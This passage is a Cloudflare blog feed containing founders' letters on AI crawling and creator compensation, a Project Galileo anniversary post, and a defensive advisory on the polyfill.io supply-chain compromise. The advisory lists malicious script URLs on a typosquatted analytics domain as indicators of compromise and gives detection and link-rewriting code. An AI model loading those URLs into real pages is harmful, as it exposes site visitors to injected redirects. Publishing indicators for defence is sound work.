    <p>As we think about our role at Cloudflare in this developing market, it's not about protecting the status quo but instead helping catalyze a better business model for the future of Internet content creation. That means creating a level playing field. Ideally, there should be lots of AI companies, large and small, and lots of content creators, large and small.</p><p>It can’t be that a new entrant AI company is at a disadvantage to a legacy search engine because one has to pay for content but the other gets it for free. But it’s also critical to realize that the right solution to that current conundrum isn’t that no one pays, it’s that, new or old, everyone who benefits from the ecosystem should contribute back to it based on their relative size.</p><p>It may seem impossibly idealistic today, but the good news is that based on the conversations we’ve had, we’re confident that if a few market participants tip — whether because they step up and do the right thing or are compelled — we will see the entire market tipping and becoming robust very quickly.</p>
    <div>
      <h2>Supporting the Ecosystem</h2>
      <a href="#supporting-the-ecosystem">
        
      </a>
    </div>
    <p>We can't do this alone and we have no plans to try to. Our mission is not to “build a better Internet” but to “<b><i>help</i></b> build a better Internet.” The solutions developed to facilitate this market need to be open, collaborative, standardized, and shared across many organizations. We’ll take some encouraging steps in that direction with announcements on partnerships and collaborations this week. And we’re proud to be a leader in this space.</p><p>The Internet is an ecosystem and we, other infrastructure providers, along with most importantly both AI companies and content creators, will be critical in ensuring that ecosystem is healthy. We’re excited to partner with those who are ready to step up and do their part to also help build a better Internet. It is possible.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6EHC7vxXoMmle1QFHwGHh9/408b73f7b677701e7242e794efa3cb52/unnamed__29_.png" />
          </figure><p>And we're optimistic that if others can collaborate in supporting the ecosystem, we may be on the cusp of a new golden age of the Internet. In our conversations with the leading AI companies, nearly all acknowledge that they have a responsibility to give back to the ecosystem and compensate content creators. Confirming this, the largest publishers are reporting they're having much more constructive conversations about licensing their content to those AI companies. And, this week, we'll be announcing new tools to help even the smallest publishers take back control of who can use what they've created.</p><p>It may seem impossible. We think it’s a no-brainer. We're proud of what Cloudflare has accomplished over the last 15 years, but there’s a lot left to do to live up to our mission. So, more than ever, it's clear: giddy up, because we're just getting started!</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/15o6NDQsh19vfz6RC9nD5v/03f8f84dc09366ffc617829f35b2e255/BLOG-2994_5.png" />
          </figure><p></p> ]]></content:encoded>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Founders' Letter]]></category>
            <guid isPermaLink="false">3dHDa6KprJoyjJldD2eInH</guid>
            <dc:creator>Matthew Prince</dc:creator>
            <dc:creator>Michelle Zatlyn</dc:creator>
        </item>
        <item>
            <title><![CDATA[Content Independence Day: no AI crawl without compensation!]]></title>
            <link>https://blog.cloudflare.com/content-independence-day-no-ai-crawl-without-compensation/</link>
            <pubDate>Tue, 01 Jul 2025 10:01:00 GMT</pubDate>
            <description><![CDATA[ It’s Content Independence Day: Cloudflare, along with a majority of the world's leading publishers and AI companies, is changing the default to block AI crawlers unless they pay creators for content. ]]></description>
            <content:encoded><![CDATA[ <p>Almost 30 years ago, two graduate students at Stanford University — Larry Page and Sergey Brin — began working on a research project they called Backrub. That, of course, was the project that resulted in Google. But also something more: it created the business model for the web.</p><p>The deal that Google made with content creators was simple: let us copy your content for search, and we'll send you traffic. You, as a content creator, could then derive value from that traffic in one of three ways: running ads against it, selling subscriptions for it, or just getting the pleasure of knowing that someone was consuming your stuff.</p><p>Google facilitated all of this. Search generated traffic. They acquired DoubleClick and built AdSense to help content creators serve ads. And they acquired Urchin to launch Google Analytics to let you measure just who was viewing your content at any given moment in time.</p><p>For nearly thirty years, that relationship was what defined the web and allowed it to flourish.</p><p>But that relationship is changing. For the first time in more than a decade, the percentage of searches run on Google is <a href="https://searchengineland.com/google-search-market-share-drops-2024-450497"><u>declining</u></a>. What's taking its place? AI.</p><p>If you're like me, you've been amazed at the new AI systems that have launched over the last two years and find yourself turning to them to answer questions that, in the past, you would have taken to Google. While it's still early, it seems clear that the interface of the future of the web will look more like ChatGPT than a spartan search box and ten blue links.</p><p>Google itself has changed. While ten years ago they presented a list of links and said that success was getting you off their site as quickly as possible, today they've added an answer box and, more recently, AI Overviews, which answer users' questions without them having to leave Google.com. 
With the answer box, researchers have found that <a href="https://scrumdigital.com/blog/zero-click-search-trends-google-serp-analysis/"><u>75 percent</u></a> of mobile queries were answered without users leaving Google. With the more recent launch of AI Overviews, it's even higher.</p><p>While Google’s users may like that, it's hurting content creators. Google still copies creators’ content, but over the last 10 years, because of the changes to the UI of “search”, it's gotten almost 10 times more difficult for a content creator to get the same volume of traffic. That means it's 10 times more difficult to generate value from ads, subscriptions, or the ego of knowing someone cares about what you created.</p><p>And that's the good news. It’s even worse with <a href="https://blog.cloudflare.com/ai-search-crawl-refer-ratio-on-radar/#how-does-this-measurement-work"><u>today’s AI tools</u></a>. With OpenAI, it's 750 times more difficult to get traffic than it was with the Google of old. With Anthropic, it's 30,000 times more difficult. The reason is simple: increasingly we aren't consuming originals, we're consuming derivatives.</p><p>The problem is that whether you create content to sell ads, sell subscriptions, or just to know that people value what you've created, an AI-driven web doesn't reward content creators the way that the old search-driven web did. And that means the deal that Google made to take content in exchange for sending you traffic just doesn't make sense anymore.</p><p>Instead of being a fair trade, the web is being strip-mined by AI crawlers with content creators seeing almost no traffic and therefore almost no value.</p><p>That changes today, July 1, what we’re calling Content Independence Day. Cloudflare, along with a majority of the world's leading publishers and AI companies, is changing the default to <a href="https://www.cloudflare.com/learning/ai/how-to-block-ai-crawlers/">block AI crawlers</a> unless they pay creators for their content. 
That content is the fuel that powers AI engines, and so it's only fair that content creators are compensated directly for it.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6GFFa6knU0nKGjhJVh8Ar8/8a1b4c0661146596cc844cdd9dd900ea/BLOG-2860_2.png" />
          </figure><p>But that's just the beginning. Next, we'll work on a marketplace where content creators and AI companies, large and small, can come together. Traffic was always a poor proxy for value. We think we can do better. Let me explain.</p><p>Imagine an AI engine like a block of Swiss cheese. New, original content that fills one of the holes in the AI engine’s block of cheese is more valuable than repetitive, low-value content that unfortunately dominates much of the web today.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6vUAgbW7FzzHSKA8tB8f8c/ea78e7cb4858602a32a91523800b882c/BLOG-2860_3.png" />
          </figure><p>We believe that if we can begin to score and value content not on how much traffic it generates, but on how much it furthers knowledge — measured by how much it fills the current holes in AI engines’ “Swiss cheese” — we will not only help AI engines get better faster, but also potentially facilitate a new golden age of high-value content creation.</p><p>We don’t know all the answers yet, but we’re working with some of the leading economists and computer scientists to figure them out.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1VNIoN0740jhfO8lu6XDpJ/98829d238884cde3bcd345779a15df89/BLOG-2860_4.png" />
          </figure><p>The web is changing. Its business model will change. And, in the process, we have an opportunity to learn from what was great about the web of the last 30 years and what we can make better for the web of the future.</p><p>Cloudflare's mission is to help build a better Internet. I'm proud of the role we're playing in doing exactly that as the web evolves. And I’m proud that we’re helping content creators stick up and demand value for the content they worked hard to create.</p><p>Happy Content Independence Day!</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2Xme0Af7HqeJpdQbapzApG/6ff9ea29b7506e10867ed9c7ac5a2280/BLOG-2860_5.png" />
          </figure><p></p> ]]></content:encoded>
            <category><![CDATA[Pay Per Crawl]]></category>
            <category><![CDATA[AI Bots]]></category>
            <category><![CDATA[AI]]></category>
            <guid isPermaLink="false">1pmK0OnvzPIip01yjWXj0x</guid>
            <dc:creator>Matthew Prince</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare’s 2024 Annual Founders’ Letter]]></title>
            <link>https://blog.cloudflare.com/cloudflare-2024-annual-founders-letter/</link>
            <pubDate>Sun, 22 Sep 2024 15:51:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare launched on September 27, 2010. This week we celebrate our fourteenth birthday ]]></description>
            <content:encoded><![CDATA[ <p>This week Cloudflare will celebrate the fourteenth anniversary of our launch. We think of it as our birthday. As is our tradition <a href="https://blog.cloudflare.com/introducing-cloudflares-automatic-ipv6-gatewa/"><u>ever since our first anniversary</u></a>, we use our Birthday Week each year to launch new products that we think of as gifts back to the Internet. For the last five years, we have also taken this time to write our <a href="https://blog.cloudflare.com/tag/founders-letter/"><u>annual Founders’ Letter</u></a> reflecting on our business and the state of the Internet. This year is no different.</p><p>That said, one thing that is different is that, as you may have noticed, we've had fewer public innovation weeks over the last year than usual. That's been because a <a href="https://blog.cloudflare.com/thanksgiving-2023-security-incident/"><u>couple</u></a> of <a href="https://blog.cloudflare.com/post-mortem-on-cloudflare-control-plane-and-analytics-outage/"><u>incidents</u></a> nearly a year ago caused us to focus on improving our internal systems over releasing new features. We're incredibly proud of our team's focus on making security, resilience, and reliability the top priorities for the last year. Today, Cloudflare's underlying platform, and the products that run on top of it, are <a href="https://blog.cloudflare.com/major-data-center-power-failure-again-cloudflare-code-orange-tested/"><u>significantly more robust than ever before</u></a>.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/16Eu23FEtjrfzUCYjwbWuh/0d8f35f2bbf4841862bebbeaf13e069d/pencil1.png" />
          </figure><p>With that work largely complete, and our platform in its strongest shape ever, we plan to pick back up the usual cadence of new product launches that we're known for. This Birthday Week, you'll see many as we roll out performance improvements only our Connectivity Cloud can deliver to accelerate all our customers' websites by a mind-blowing 45 percent (automatically and for free), launch new features to make our developer platform faster and easier to use, plug the web's last encryption hole, accelerate AI inference globally, provide new levels of support for startups and the open source community, and much much more.</p><p>This is easily our favorite week of the year because of how it allows our team to give back to the Internet and live up to our mission.</p>
    <div>
      <h2>Challenges for the Internet ahead</h2>
      <a href="#challenges-for-the-internet-ahead">
        
      </a>
    </div>
    <p>The robustness of Cloudflare's platform today contrasts with what feels like an Internet that has become far more fragile over the previous year. When we first articulated our mission as helping build a better Internet, we assumed that “better” meant one that was faster, more reliable, more secure, more private, and more efficient. But today it seems like something more fundamental is at stake.</p><p>The last year has been characterized by a normalization of <a href="https://blog.cloudflare.com/tag/internet-shutdown/">Internet shutdowns</a> and limits on Internet access around the world. What were once tactics reserved for authoritarian regimes have spread to even Western democratic nations, where courts and legislatures have been emboldened to restrict fundamental protocols to control perceived harms.</p><p>We’ve seen a dramatic uptick in courts of limited jurisdiction ordering sites they found objectionable blocked globally at the DNS level, nations turning off the Internet for most of their citizens in the name of preventing cheating on standardized tests (while it remains on in wealthy and politically connected neighborhoods), ISPs proposing legislation to impose new taxes on content creators, and whole services being banned in countries that had previously declared that more Internet was always better than less. </p><p>This is, unfortunately, a dark time in the history of the Internet.</p>
    <div>
      <h2>AI’s Threat to Original Content Creation</h2>
      <a href="#ais-threat-to-original-content-creation">
        
      </a>
    </div>
    <p>At the same time, the business model of the web is eroding. The quid pro quo of the web’s last era — the search era — was that you let a company like Google scrape data from your website in exchange for them sending you traffic. In that model, content creators could then generate value from that traffic through ads, selling products, or just getting the ego boost of knowing that someone cares enough about the thing you created to take the time to view it.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2cMITvSWFI9yZpfwNC4hBU/4bd45d7fc413be97893e4a00bc096e2b/pen1.png" />
          </figure><p>That same quid pro quo does not hold up in the era we’re moving into — the AI era — where answers are delivered to questions without ever having to visit the authoritative source. And, if content creators can no longer generate value from their creations, it’s inevitable they’ll generate less content and we’ll all, including the AI companies that need original content to train their models, lose out as a result.</p>
    <div>
      <h2>Picking Up the Mantle</h2>
      <a href="#picking-up-the-mantle">
        
      </a>
    </div>
    <p>The Internet remains a miracle, but it no longer feels inevitable. It is under attack from active adversaries and beginning to rot from benign neglect. And, with the largest tech companies distracted by their own regulatory challenges, it finds itself without a clear champion. We’re proud of our team for picking up that mantle. At Cloudflare, we believe in the Internet and we will fight for it.</p><p>That's why we invest in our public policy team to educate lawmakers and jurists on how best to control the harms created by some limited corners of the Internet without destabilizing its underlying protocols. It's why we believe it’s important to provide so many of our services for free. And it's why this Birthday Week we'll announce new ways for the AI systems that hunger for original content to compensate content creators in a way that is equitable. Without a new paradigm, we worry that the incentives that allowed the Internet to flourish will shrivel and its miracle will fade.</p><p>Missions matter. Ours is to help build a better Internet. We, or one of our senior executives, still talk to every candidate we hire before extending an offer because we want to ensure we communicate the importance of our mission. One of the most common questions we’re asked is how we plan to preserve Cloudflare's culture. Our answer is always the same: the goal isn't how to preserve our culture, it's always how to improve it. The same has to be true for the Internet. We can't just try to preserve the past, we need to imagine new ways to improve it.</p><p>That requires champions to stand up and imagine a better Internet. It’s been too long since you’ve read a positive story about the Internet, even though it continues to be a miracle. We are proud that we have the team, platform, and mantle to not just preserve, but improve on, that miracle. It is our mission and what motivates everything we do at Cloudflare. And nowhere is that more on display than during the week ahead. 
If you too are inspired by our mission, we encourage you to <a href="https://www.cloudflare.com/careers/"><u>apply to join our team</u></a>.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1LLnEP9Y10dOWw4NWAEcHe/700027bd46e496ff07c2910a3887b2cf/pen2.png" />
          </figure><p>Stay tuned for an incredible Birthday Week of new products that make progress on our mission. Thank you to our team around the world for everything you do. Cloudflare is stronger because of the work we've accomplished, and the Internet will be stronger because of Cloudflare.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6KvuXDwtmqb0nDoJqIWQWd/db265cb24d224458000d78a41cd55055/matthew-michelle.png" />
          </figure><p></p> ]]></content:encoded>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Founders' Letter]]></category>
            <category><![CDATA[Better Internet]]></category>
            <guid isPermaLink="false">7puHT1ajSilk9b0LGo3s2H</guid>
            <dc:creator>Matthew Prince</dc:creator>
            <dc:creator>Michelle Zatlyn</dc:creator>
        </item>
        <item>
            <title><![CDATA[Automatically replacing polyfill.io links with Cloudflare’s mirror for a safer Internet]]></title>
            <link>https://blog.cloudflare.com/automatically-replacing-polyfill-io-links-with-cloudflares-mirror-for-a-safer-internet/</link>
            <pubDate>Wed, 26 Jun 2024 20:23:41 GMT</pubDate>
            <description><![CDATA[ polyfill.io, a popular JavaScript library service, can no longer be trusted and should be removed from websites ]]></description>
            <content:encoded><![CDATA[ <p>polyfill.io, a popular JavaScript library service, can no longer be trusted and should be removed from websites.</p><p><a href="https://sansec.io/research/polyfill-supply-chain-attack">Multiple reports</a>, corroborated by data seen by our own client-side security system, <a href="https://developers.cloudflare.com/page-shield/">Page Shield</a>, have shown that the polyfill service was being used, and could be used again, to inject malicious JavaScript code into users’ browsers. This is a real threat to the Internet at large given the popularity of this library.</p><p>We have, over the last 24 hours, released an automatic JavaScript URL rewriting service that will rewrite any link to polyfill.io found in a website proxied by Cloudflare <a href="https://cdnjs.cloudflare.com/polyfill/">to a link to our mirror under cdnjs</a>. This will avoid breaking site functionality while mitigating the risk of a supply chain attack.</p><p>Any website on the free plan has this feature automatically activated now. Websites on any paid plan can turn on this feature with a single click.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5R0ht5q4fAwm8gm3a2Xe5U/6b3ec28498e76ff75e37b58f3673e49a/image1-22.png" />
            
            </figure><p>You can find this new feature under <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/settings">Security ⇒ Settings</a> on any zone using Cloudflare.</p><p>Contrary to what is stated on the polyfill.io website, Cloudflare has never recommended the polyfill.io service or authorized their use of Cloudflare’s name on their website. We have asked them to remove the false statement, and they have, so far, ignored our requests. This is yet another warning sign that they cannot be trusted.</p><p>If you are not using Cloudflare today, we still highly recommend that you remove any use of polyfill.io and/or find an alternative solution. And, while the automatic replacement function will handle most cases, the best practice is to remove polyfill.io from your projects and replace it with a secure alternative mirror like Cloudflare’s, even if you are a customer.</p><p>You can do this by searching your code repositories for instances of polyfill.io and replacing it with <a href="https://cdnjs.cloudflare.com/polyfill/">cdnjs.cloudflare.com/polyfill/</a> (Cloudflare’s mirror). This is a non-breaking change, as the two URLs will serve the same polyfill content. All website owners, regardless of whether their website uses Cloudflare, should do this now.</p>
    <div>
      <h2>How we came to this decision</h2>
      <a href="#how-we-came-to-this-decision">
        
      </a>
    </div>
    <p>Back in February, the domain polyfill.io, which hosts a popular JavaScript library, was sold to a new owner: Funnull, a relatively unknown company. <a href="/polyfill-io-now-available-on-cdnjs-reduce-your-supply-chain-risk">At the time, we were concerned</a> that this created a supply chain risk. This led us to spin up our own mirror of the polyfill.io code hosted under cdnjs, a JavaScript library repository sponsored by Cloudflare.</p><p>The new owner was unknown in the industry and did not have a track record of trust to administer a project such as polyfill.io. The concern, <a href="https://x.com/triblondon/status/1761852117579427975">highlighted even by the original author</a>, was that if they were to abuse polyfill.io by injecting additional code into the library, it could cause far-reaching security problems on the Internet affecting several hundred thousand websites. Or it could be used to perform a targeted supply-chain attack against specific websites.</p><p>Unfortunately, that worry came true on June 25, 2024, as the polyfill.io service was being used to inject nefarious code that, under certain circumstances, redirected users to other websites.</p><p>We have taken the exceptional step of using our ability to modify HTML on the fly to replace references to the polyfill.io CDN in our customers’ websites with links to our own, safe, mirror created back in February.</p><p>In the meantime, additional threat feed providers have also taken the decision to <a href="https://github.com/uBlockOrigin/uAssets/commit/91dfc54aed0f0aa514c1a481c3e63ea16da94c03">flag the domain as malicious</a>. We have not outright blocked the domain through any of the mechanisms we have because we are concerned it could cause widespread web outages, given how broadly polyfill.io is used, with some estimates indicating <a href="https://w3techs.com/technologies/details/js-polyfillio">usage on nearly 4% of all websites</a>.</p>
    <div>
      <h3>Corroborating data with Page Shield</h3>
      <a href="#corroborating-data-with-page-shield">
        
      </a>
    </div>
    <p>The original report indicates that malicious code was injected that, under certain circumstances, would redirect users to betting sites. It was doing this by loading additional JavaScript that would perform the redirect, under a set of additional domains which can be considered Indicators of Compromise (IoCs):</p>
            <pre><code>https://www.googie-anaiytics.com/analytics.js
https://www.googie-anaiytics.com/html/checkcachehw.js
https://www.googie-anaiytics.com/gtags.js
https://www.googie-anaiytics.com/keywords/vn-keyword.json
https://www.googie-anaiytics.com/webs-1.0.1.js
https://www.googie-anaiytics.com/analytics.js
https://www.googie-anaiytics.com/webs-1.0.2.js
https://www.googie-anaiytics.com/ga.js
https://www.googie-anaiytics.com/web-1.0.1.js
https://www.googie-anaiytics.com/web.js
https://www.googie-anaiytics.com/collect.js
https://kuurza.com/redirect?from=bitget</code></pre>
            <p>(note the intentional misspelling of Google Analytics)</p><p>Page Shield, our client-side security solution, is available on all paid plans. When turned on, it collects information about JavaScript files loaded by end user browsers accessing your website.</p><p>By looking at the database of detected JavaScript files, we immediately found matches with the IoCs provided above starting as far back as 2024-06-08 15:23:51 (the first-seen timestamp on a Page Shield-detected JavaScript file). This was a clear indication that malicious activity was active and associated with polyfill.io.</p>
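    <p>Conceptually, that matching step amounts to checking each detected script URL's host against the IoC domains above. A minimal sketch — the function name and data shapes here are illustrative, not Page Shield's actual implementation:</p>

```python
# Minimal sketch: flag detected script URLs whose host matches a known IoC
# domain. Illustrative only, not Page Shield's actual code.
from urllib.parse import urlparse

IOC_DOMAINS = {"www.googie-anaiytics.com", "kuurza.com"}  # from the list above

def match_iocs(detected_urls: list[str]) -> list[str]:
    """Return the URLs whose host is an IoC domain or a subdomain of one."""
    hits = []
    for url in detected_urls:
        host = urlparse(url).netloc
        if host in IOC_DOMAINS or any(host.endswith("." + d) for d in IOC_DOMAINS):
            hits.append(url)
    return hits
```

    <p>Matching on the host rather than the full URL means any of the script paths served from a flagged domain is caught, not just the exact files seen so far.</p>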
    <div>
      <h3>Replacing insecure JavaScript links to polyfill.io</h3>
      <a href="#replacing-insecure-javascript-links-to-polyfill-io">
        
      </a>
    </div>
    <p>To achieve performant HTML rewriting, we need to make blazing-fast HTML alterations as responses stream through Cloudflare’s network. This has been made possible by leveraging <a href="/rust-nginx-module">ROFL (Response Overseer for FL)</a>. ROFL powers various Cloudflare products that need to alter HTML as it streams, such as <a href="https://developers.cloudflare.com/speed/optimization/content/fonts/">Cloudflare Fonts</a>, <a href="https://developers.cloudflare.com/waf/tools/scrape-shield/email-address-obfuscation/">Email Obfuscation</a>, and <a href="https://developers.cloudflare.com/speed/optimization/content/rocket-loader/">Rocket Loader</a>.</p><p>ROFL is developed entirely in Rust. Rust’s memory-safety guarantees are indispensable for protecting against memory-safety bugs while processing a staggering volume of requests, measuring in the millions per second. Rust's compiled nature allows us to finely optimize our code for specific hardware configurations, delivering performance gains compared to interpreted languages.</p><p>The performance of ROFL allows us to rewrite HTML on-the-fly and modify the polyfill.io links quickly, safely, and efficiently. This speed helps us reduce any additional latency added by processing the HTML file.</p><p>If the feature is turned on, for any HTTP response with an HTML Content-Type, we parse all JavaScript script tag source attributes. If any are found linking to polyfill.io, we rewrite the src attribute to link to our mirror instead. We map to the correct version of the polyfill service while the query string is left untouched.</p><p>The logic will not activate if a Content Security Policy (CSP) header is found in the response. This ensures we don’t replace the link while breaking the CSP policy and therefore potentially breaking the website.</p>
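    <p>The rewrite rule described above — swap the host for the mirror, keep the path and query string, and skip responses carrying a CSP header — can be sketched as follows. This is an illustrative approximation in Python: ROFL itself is a streaming Rust HTML parser, so a regex stands in for the real parser here, and the CSP check is modeled as a boolean derived from the response headers:</p>

```python
# Illustrative approximation of the rewrite rule described above. ROFL is a
# streaming Rust HTML parser; a regex stands in for it here, and the CSP check
# is modeled as a boolean derived from the response headers.
import re

_POLYFILL_SRC = re.compile(
    r'(<script\b[^>]*\bsrc=["\'])https?://(?:cdn\.)?polyfill\.io(/[^"\']*)',
    re.IGNORECASE,
)

def rewrite_polyfill_links(html: str, has_csp_header: bool) -> str:
    # Skip rewriting when the response carries a CSP header, so the
    # substituted origin cannot break the site's policy.
    if has_csp_header:
        return html
    # Swap only the host for the cdnjs mirror, keeping the original
    # path and query string intact.
    return _POLYFILL_SRC.sub(r"\1https://cdnjs.cloudflare.com/polyfill\2", html)
```

    <p>Because only the host is replaced, a tag like <code>src="https://cdn.polyfill.io/v3/polyfill.min.js?features=fetch"</code> keeps its version path and feature list after rewriting.</p>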
    <div>
      <h3>Default on for free customers, optional for everyone else</h3>
      <a href="#default-on-for-free-customers-optional-for-everyone-else">
        
      </a>
    </div>
    <p>Cloudflare proxies millions of websites, and a large portion of these sites are on our free plan. Free plan customers tend to have simpler applications and often lack the resources to react quickly to security concerns. We therefore decided to turn the feature on by default for sites on our free plan: the likelihood of causing issues is reduced, and it helps keep safe a very large portion of the applications using polyfill.io.</p><p>Paid plan customers, on the other hand, have more complex applications and react more quickly to security notices. We are confident that most paid customers using polyfill.io and Cloudflare will appreciate the ability to virtually patch the issue with a single click, while controlling when to do so.</p><p>All customers can turn off the feature at any time.</p><p>This isn’t the first time we’ve decided a security problem was so widespread and serious that we’d enable protection for all customers regardless of whether they were a paying customer or not. Back in 2014, we enabled <a href="/shellshock-protection-enabled-for-all-customers">Shellshock protection</a> for everyone. In 2021, when the log4j vulnerability was disclosed, <a href="/cve-2021-44228-log4j-rce-0-day-mitigation/">we rolled out protection</a> for all customers.</p>
    <div>
      <h2>Do not use polyfill.io</h2>
      <a href="#do-not-use-polyfill-io">
        
      </a>
    </div>
    <p>If you are using Cloudflare, you can remove polyfill.io with a single click on the Cloudflare dashboard by heading over to <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/settings">your zone ⇒ Security ⇒ Settings</a>. If you are a free customer, the rewrite is automatically active. This feature, we hope, will help you quickly patch the issue.</p><p>Nonetheless, you should ultimately search your code repositories for instances of polyfill.io and replace them with an alternative provider, such as Cloudflare’s secure mirror under cdnjs (<a href="https://cdnjs.cloudflare.com/polyfill/">https://cdnjs.cloudflare.com/polyfill/</a>). Website owners who are not using Cloudflare should also perform these steps.</p><p>The underlying bundle links you should use are:</p><p>For minified: <a href="https://cdnjs.cloudflare.com/polyfill/v3/polyfill.min.js">https://cdnjs.cloudflare.com/polyfill/v3/polyfill.min.js</a>
For unminified: <a href="https://cdnjs.cloudflare.com/polyfill/v3/polyfill.js">https://cdnjs.cloudflare.com/polyfill/v3/polyfill.js</a></p><p>Doing this ensures your website is no longer relying on polyfill.io.</p> ]]></content:encoded>
            <category><![CDATA[CDNJS]]></category>
            <category><![CDATA[JavaScript]]></category>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[Application Security]]></category>
            <category><![CDATA[Application Services]]></category>
            <category><![CDATA[Supply Chain Attacks]]></category>
            <category><![CDATA[Attacks]]></category>
            <category><![CDATA[Better Internet]]></category>
            <guid isPermaLink="false">3NHy1gOkql57RbBcdjWs5g</guid>
            <dc:creator>Matthew Prince</dc:creator>
            <dc:creator>John Graham-Cumming</dc:creator>
            <dc:creator>Michael Tremante</dc:creator>
        </item>
        <item>
            <title><![CDATA[Celebrating 10 years of Project Galileo]]></title>
            <link>https://blog.cloudflare.com/celebrating-10-years-of-project-galileo/</link>
            <pubDate>Wed, 12 Jun 2024 13:00:49 GMT</pubDate>
            <description><![CDATA[ On its 10th anniversary, Cloudflare's Project Galileo continues to offer free security services to over 2,600 journalists and nonprofits globally, supporting human rights and democracy. ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1nSpJ5IcewxQNWxMluA2Ra/00de9f546ce24838099ca0f7eaf35e18/image--17--1.png" />
            
            </figure><p>One of the great benefits of the Internet has been its ability to empower activists and journalists in repressive societies to organize, communicate, and simply find each other. Ten years ago today, Cloudflare launched Project Galileo, a program which today provides security services, at no cost, to more than 2,600 independent journalists and nonprofit organizations around the world supporting human rights, democracy, and local communities. You can read last week’s <a href="/galileo10anniversaryradardashboard">blog</a> and <a href="https://radar.cloudflare.com/reports/project-galileo-10th-anniv?cf_target_id=712A46674D7CB372A408DAE616C00495">Radar dashboard</a> that provide a snapshot of what public interest organizations experience on a daily basis when it comes to keeping their websites online.</p><div>
  
</div>
<p></p>
    <div>
      <h3>Origins of Project Galileo</h3>
      <a href="#origins-of-project-galileo">
        
      </a>
    </div>
    <p>We’ve admitted before that Project Galileo was born out of a mistake, but the story is worth retelling. In 2014, when Cloudflare was a much smaller company with a smaller network, our free service did not include DDoS mitigation. If a free customer came under a withering attack, we would stop proxying traffic to protect our own network. It just made sense.</p><p>One evening, a site that was using us came under a significant DDoS attack, exhausting Cloudflare resources. After pulling up the site and seeing Cyrillic writing and pictures of men with guns, the young engineer on call followed the playbook. He pushed a button and sent all the attack traffic to the site’s origin, effectively kicking it off the Internet.</p><p>This was in 2014, during Russia’s first invasion of Ukraine, when it seized Crimea. What the engineer did not know was that he had just kicked off an independent Ukrainian newspaper that was covering the attack and the invasion. The newspaper had tried to pay for services with a credit card but failed because Russia had targeted Ukraine’s financial infrastructure, taking banking institutions offline. It wasn’t the engineer’s fault. He had no reason to know that the site was important, and no alternative playbook to follow.</p><p>After that incident, we vowed to never let an organization that was serving such an important purpose go offline simply because they couldn’t pay for services. And so the idea for Project Galileo was born.</p><p>Although the idea of providing free security services was straightforward, figuring out which organizations are important enough to deserve such services was not. We know we can’t build a better Internet alone – it’s why Cloudflare’s mission is to <i>help</i> build a better Internet. 
So with Project Galileo, we sought the assistance of a group of civil society organizations to partner with us and help identify the organizations that need our protection.</p><p>Repression of ideas that threaten authority hardly started with DDoS attacks or the invention of the Internet. We named the effort Project Galileo after the story of Galileo Galilei, who was persecuted in the 1600s for publishing a book concluding that the Earth was not at the center of the universe, but orbits the sun. After Galileo was labeled a heretic, his book was banned and his ideas were suppressed for more than 100 years.</p><p>Four hundred years after Galileo, we see attempts to suppress the online voices of journalists and human rights workers who might challenge the status quo. We’re proud of the fact that through Project Galileo, we keep so many of those voices online.</p><div>
  
</div>
<p></p>
    <div>
      <h3>Growth of Project Galileo</h3>
      <a href="#growth-of-project-galileo">
        
      </a>
    </div>
    <p>Ten years after the launch of Project Galileo, Cloudflare has changed a lot. Our network has grown from data centers in fewer than 30 cities in 2014 to a network that runs in 320 cities and more than 120 countries. We’ve massively expanded our product suite to include whole new lines of products, including a full set of <a href="https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/">Zero Trust</a> services and a developer suite that enables developers to build a wide range of applications, including AI applications, on our network.</p><p>As Cloudflare has grown, so has Project Galileo. We have more than quadrupled the number of entities we protect in the last five years, from 600 at Project Galileo’s five-year anniversary to more than <a href="/galileo10anniversaryradardashboard">2,600 today</a>, located in 111 different countries. We’ve expanded from our original 14 civil society partners to 54 today. Our partners span countries, continents, and subject matter areas, sharing their expertise on organizations that would benefit from cybersecurity assistance.</p><p>When we expand our product offerings, we routinely ask whether new services would be valuable to the journalists, humanitarian groups, and nonprofits that benefit from Project Galileo. After Cloudflare launched our Zero Trust offering, we <a href="/cloudflare-zero-trust-for-galileo-and-athenian">announced</a> that we would offer those services for free to participants in Project Galileo to protect themselves against threats like data loss and malware. 
After Cloudflare acquired Area 1, we announced that we would offer Cloudflare’s email security products for free to the same participants.</p><p>We’ve tried to make our products easy for a small organization to use, building a <a href="https://www.cloudflare.com/impact-portal/">Social Impact Portal</a> and a <a href="https://cf-assets.www.cloudflare.com/slt3lc6tev37/4R2Wyj1ERPecMhbycOiPj8/c30f3e8502a04c6626e98072c48d4d7b/Zero_Trust_Roadmap_for_High-Risk_Organizations.pdf">Zero Trust roadmap</a> for civil society and at-risk communities. Cloudflare’s teams also help participants onboard and troubleshoot when they face challenges.</p>
    <div>
      <h3>What Project Galileo means for civil society groups now</h3>
      <a href="#what-project-galileo-means-for-civil-society-groups-now">
        
      </a>
    </div>
